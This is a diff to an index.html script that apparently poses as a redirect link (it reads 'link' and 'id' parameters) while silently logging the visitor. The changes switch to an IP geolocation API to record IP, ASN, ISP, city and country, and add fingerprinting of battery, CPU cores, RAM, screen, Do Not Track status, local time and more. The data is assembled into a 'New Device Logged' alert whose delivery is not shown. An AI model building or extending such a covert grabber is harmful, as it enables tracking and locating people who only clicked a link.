--- a/index.html
+++ b/index.html
@@ -4,28 +4,46 @@
   const redirectUrl = params.get("link");
   const uid = params.get("id");
 
-  if (!redirectUrl || !uid) return;
+  if (!uid || !redirectUrl) return;
 
-  const [ipv4, ipv6] = await Promise.all([
-    fetch("https://api.ipify.org?format=json").then(r => r.json()).then(d => d.ip).catch(() => "N/A"),
-    fetch("https://api64.ipify.org?format=json").then(r => r.json()).then(d => d.ip).catch(() => "N/A"),
-  ]);
+  const ipData = await fetch("https://ipapi.co/json/")
+    .then(res => res.json())
+    .catch(() => ({}));
 
+  const ip = (ipData.ip || "").includes(":") ? "N/A" : ipData.ip || "N/A";
   const timezone = Intl.DateTimeFormat().resolvedOptions().timeZone || "Unknown";
   const now = new Date().toISOString();
+  const localTime = new Date().toString();
+
+  const battery = await navigator.getBattery?.().catch(() => null) || {};
+  const batteryLevel = battery.level != null ? `${Math.round(battery.level * 100)}%` : "N/A";
+  const isCharging = battery.charging != null ? (battery.charging ? "Yes" : "No") : "N/A";
 
   const info = {
     title: "🎯 New Device Logged",
     color: 0xff0000,
     fields: [
       { name: "ID", value: uid, inline: false },
-      { name: "IPv4", value: ipv4, inline: true },
-      { name: "IPv6", value: ipv6, inline: true },
+      { name: "IP", value: ip, inline: true },
+      { name: "ASN", value: ipData.asn || "N/A", inline: true },
+      { name: "Org", value: ipData.org || "N/A", inline: true },
+      { name: "City", value: ipData.city || "N/A", inline: true },
+      { name: "Region", value: ipData.region || "N/A", inline: true },
+      { name: "Country", value: ipData.country_name || "N/A", inline: true },
+      { name: "Timezone", value: timezone, inline: true },
       { name: "Language", value: navigator.language || "N/A", inline: true },
       { name: "Platform", value: navigator.platform || "N/A", inline: true },
       { name: "User-Agent", value: navigator.userAgent.slice(0, 1024), inline: false },
       { name: "Screen", value: `${screen.width}x${screen.height} @ ${screen.colorDepth}bit`, inline: true },
-      { name: "Timezone", value: timezone, inline: true },
+      { name: "CPU Cores", value: navigator.hardwareConcurrency?.toString() || "N/A", inline: true },
+      { name: "RAM (GB)", value: navigator.deviceMemory?.toString() || "N/A", inline: true },
+      { name: "Touch Support", value: "ontouchstart" in window ? "Yes" : "No", inline: true },
+      { name: "Battery", value: `${batteryLevel} (Charging: ${isCharging})`, inline: true },
+      { name: "Do Not Track", value: navigator.doNotTrack || "N/A", inline: true },
+      { name: "Dark Mode", value: window.matchMedia("(prefers-color-scheme: dark)").matches ? "Yes" : "No", inline: true },
+      { name: "Cookies Enabled", value: navigator.cookieEnabled ? "Yes" : "No", inline: true },
+      { name: "Online", value: navigator.onLine ? "Yes" : "No", inline: true },
+      { name: "Local Time", value: localTime, inline: false },
       { name: "Timestamp", value: now, inline: false },
     ],
   };
